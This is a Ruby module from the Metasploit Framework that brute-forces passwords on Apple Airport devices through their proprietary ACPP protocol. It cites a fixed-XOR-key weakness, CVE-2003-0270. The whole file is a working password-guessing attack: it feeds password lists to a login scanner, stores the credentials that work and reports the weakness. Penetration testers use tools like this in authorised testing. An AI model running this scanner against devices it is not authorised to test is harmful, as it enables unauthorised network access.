GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/acpp/login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/acpp'
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # ACPP authenticates with a password alone; there is no username, so the
  # username-related AuthBrute options are meaningless and are deregistered
  # in #initialize.
  USERNAME_OPTIONS = %w[
    DB_ALL_USERS
    DB_ALL_CREDS
    DB_SKIP_EXISTING
    USERNAME
    USERPASS_FILE
    USER_FILE
    USER_AS_PASS
  ].freeze

  # Module metadata plus option wiring: the only module-specific option is
  # RPORT, defaulting to the protocol's well-known port.
  def initialize
    super(
      'Name' => 'Apple Airport ACPP Authentication Scanner',
      'Description' => %q(
        This module attempts to authenticate to an Apple Airport using its
        proprietary and largely undocumented protocol known only as ACPP.
      ),
      'Author' => ['Jon Hart <jon_hart[at]rapid7.com>'],
      'References' => [
        %w(CVE 2003-0270) # Fixed XOR key used to encrypt password
      ],
      'License' => MSF_LICENSE
    )

    register_options([Opt::RPORT(Rex::Proto::ACPP::DEFAULT_PORT)])
    deregister_options(*USERNAME_OPTIONS)
    register_autofilter_ports([Rex::Proto::ACPP::DEFAULT_PORT])
  end

  # Scanner entry point, called once per target host.
  #
  # Builds the password list, runs the ACPP login scanner against the host and
  # records every attempt in the database: successes as credential logins plus
  # a vuln entry, failures as invalidated logins.
  #
  # @param ip [String] address of the host being scanned
  # @return [void]
  def run_host(ip)
    vprint_status("#{ip}:#{rport} - Starting ACPP login sweep")

    scanner = build_scanner(ip, build_credential_collection)
    scanner.scan! do |result|
      password = result.credential.private
      credential_data = result.to_h.merge(
        module_fullname: fullname,
        workspace_id: myworkspace_id
      )

      if result.success?
        record_success(ip, credential_data, password)
      else
        record_failure(ip, credential_data, password, result)
      end
    end
  end

  private

  # Password-only credential collection drawn from the datastore, with any
  # passwords already stored in the database placed first.
  #
  # @return [Metasploit::Framework::PrivateCredentialCollection]
  def build_credential_collection
    collection = Metasploit::Framework::PrivateCredentialCollection.new(
      blank_passwords: datastore['BLANK_PASSWORDS'],
      pass_file: datastore['PASS_FILE'],
      password: datastore['PASSWORD']
    )
    prepend_db_passwords(collection)
  end

  # Login scanner for one host; transport, TLS, proxy and pacing settings are
  # all forwarded from the datastore via configure_login_scanner.
  #
  # @param ip [String] target address
  # @param cred_collection [Metasploit::Framework::PrivateCredentialCollection]
  # @return [Metasploit::Framework::LoginScanner::ACPP]
  def build_scanner(ip, cred_collection)
    Metasploit::Framework::LoginScanner::ACPP.new(
      configure_login_scanner(
        host: ip,
        port: rport,
        proxies: datastore['PROXIES'],
        cred_details: cred_collection,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: datastore['ConnectTimeout'],
        max_send_size: datastore['TCP::max_send_size'],
        send_delay: datastore['TCP::send_delay'],
        framework: framework,
        framework_module: self,
        ssl: datastore['SSL'],
        ssl_version: datastore['SSLVersion'],
        ssl_verify_mode: datastore['SSLVerifyMode'],
        ssl_cipher: datastore['SSLCipher'],
        local_port: datastore['CPORT'],
        local_host: datastore['CHOST']
      )
    )
  end

  # Persist a successful login and report the underlying weakness.
  #
  # The credential core is created from the hash before :core is attached,
  # then the login is recorded against that core. The accepted password is
  # echoed in the console output and in the vuln info.
  #
  # @param ip [String] target address
  # @param credential_data [Hash] result hash augmented with module/workspace
  # @param password [String] the private that authenticated
  # @return [void]
  def record_success(ip, credential_data, password)
    credential_data[:core] = create_credential(credential_data)
    create_credential_login(credential_data)
    print_good("#{ip}:#{rport} - ACPP Login Successful: #{password}")
    report_vuln(
      host: ip,
      port: rport,
      proto: 'tcp',
      name: 'Fixed XOR key used to encrypt passwords',
      info: "Successful authentication with '#{password}'",
      refs: references
    )
  end

  # Mark a rejected password as invalid in the database and log it verbosely.
  #
  # @param ip [String] target address
  # @param credential_data [Hash] result hash augmented with module/workspace
  # @param password [String] the private that was rejected
  # @param result [Metasploit::Framework::LoginScanner::Result]
  # @return [void]
  def record_failure(ip, credential_data, password, result)
    invalidate_login(credential_data)
    vprint_error("#{ip}:#{rport} - ACPP LOGIN FAILED: #{password} (#{result.status}: #{result.proof})")
  end
end